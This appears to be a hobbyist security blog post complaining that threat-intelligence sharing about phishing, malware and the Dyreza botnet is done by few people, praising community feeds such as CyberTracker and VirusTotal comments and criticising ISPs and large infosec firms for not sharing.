We have....um, tutorials. Oh, and virus and phishing email articles!
"install Weatherbug one more God-damn time, Mike, you'll be running DeepFreeze faster than you can say Ask Toolbar.", thought the IT lady.
You know, I should use this front page for something.
What a month. Who is this BiN badass? How is that even possible?
Netcraft is cool, it gives us a place to put phishing site information, and it is validated very quickly (usually) and shows up on real blocklists in a timely manner.
Another cool group of people is malwarehunterteam.com, and their helpful data feeds at http://cybertracker.malwarehunterteam.com.
One thing that CyberTracker gives a shit about that no one else seems to care about are the phishing-related email addresses that phishing sites send data to. If someone, like maybe the Gmail Team at Google, looked at this list they could use that as a starting point to look at abused/abusive gmail accounts.
Obviously VirusTotal.com is great. The comments section can provide really useful information if someone posts really good info (or not, if the comment is just "#malware" ... we know its malware dude, why do you think we are all here?)...
So many choices for data sharing! But it seems like there's not REALLY that many people sharing data. It's mostly the same group of people. If you think how many IT people there are, in commercial and community organizations all over the world, seeing hacked websites, malvertising, phishing, malware, attacks, we should be seeing a lot of shared information.
According to this article form net-security.org called "Most organizations value threat intelligence sharing", you would think that all these organizations REALLY are sharing. But that is bullshit. The same minority of people are reporting 90% of the stuff that is released to the public.
Lately, the Dyreza botnet (s?) has been taking over ISP equipment to use them as proxies for downloads and C2 traffic. You'd think that ISPs, being technically-oriented people, would be willing to share some information when I informed them of their breach... but alas only 3 organizations out of 15 notified even responded, and only 2 shared any info when I asked them to. (One of them actually provided the ELF binaries they found on the hacked device, which I relayed via twitter to everyone else... because sharing.)
That's a whole other problem, why are the ISPs hearing it from me first? No offence to myself, but THL is a low-skill, non-infosec, low-rent side hobby. If most organizations "value intelligence sharing", surely the ISPs would hear it from someone else first. In fact, there is a high-rent infosec rockstar company (who I won't name), who seems like they already knew all about it.... but never bothered to notify any of the ISPs? Or anyone at all outside their own organization.
Most organizations value mouth-service and buzzword-usage, very few actually DO WORK to share any information at all.
Q: But aren't you just a pageview-whoring blogger?
A: I'd say that I am ALSO a pageview-whoring blogger, which is in addition to doing that which takes up most of my allotted hobby time: rapid triage, half-assed intel given quickly to anyone who will listen, for research and blocklist purposes to mitigate damage to Joe Sixpack.
Like in VT comments:
Or any groups who will listen to me or let me submit what I find, like malwarehunterteam.com
While trying to contribute data to a group of real researchers, someone from an infosec-rockstar organization made an oblique comment that certain individuals are likely to publish information for pageview-whoring purposes. The implication is that pageview-whores (perhaps he meant me) are financially incentivized to publish useful information.
While there is truth to this statement, I am incentivized to the tune of about $40 a month (or -$40 a month if I can't make this thing pay for itself).
Contrast that with infosec-rockstar organizations who are financially DIS-incentivized to publish useful information for public consumption. The information is more useful to them if kept in-house. I bet the are looking at a lot more than $40 of incentive.
The rockstar orgs are big-picture people. There's nothing wrong with that. But we need more rapid triage people, busting open malware and posting IPs, URLs, and talking about new behaviors they notice.